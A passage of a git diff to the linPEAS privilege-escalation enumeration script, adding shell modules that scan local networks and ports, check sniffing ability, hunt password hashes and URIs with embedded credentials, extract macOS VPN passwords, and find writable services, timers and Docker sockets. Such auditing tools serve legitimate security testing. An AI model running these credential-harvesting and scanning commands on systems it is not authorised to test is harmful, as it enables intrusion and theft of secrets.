regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi -fi diff --git a/linPEAS/builder/linpeas_parts/network_information.sh b/linPEAS/builder/linpeas_parts/network_information.sh new file mode 100644 index 0000000..92ebef1 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/network_information.sh @@ -0,0 +1,176 @@ +########################################### +#---------) Network Information (---------# +########################################### + +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType + echo "" +fi + +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" + +#-- NI) /etc/inetd.conf +print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" +(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" +echo "" + +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" + +#-- NI) Neighbours +print_2title "Networks and neighbours" +if [ "$MACOS" ]; then + netstat -rn 2>/dev/null +else + (route || ip n || cat /proc/net/route) 2>/dev/null +fi +(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +print_2title "Iptables rules" +(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" +echo "" + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports + echo "" + + print_2title "VLANs" + networksetup -listVLANs + echo "" + + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" + + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + + else + print_2title "Scanning local networks (using /24)" + + if ! [ "$PING" ] && ![ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi + + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" + fi + + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done + fi +fi + +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType + echo "" + + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType + echo "" + + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh new file mode 100644 index 0000000..fbb435e --- /dev/null +++ b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh @@ -0,0 +1,303 @@ +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify allows in context="default" + done +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi +done +else echo_not_found "busctl" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/software_information.sh b/linPEAS/builder/linpeas_parts/software_information.sh new file mode 100644 index 0000000..49436fd --- /dev/null +++ b/linPEAS/builder/linpeas_parts/software_information.sh @@ -0,0 +1,553 @@ +########################################### 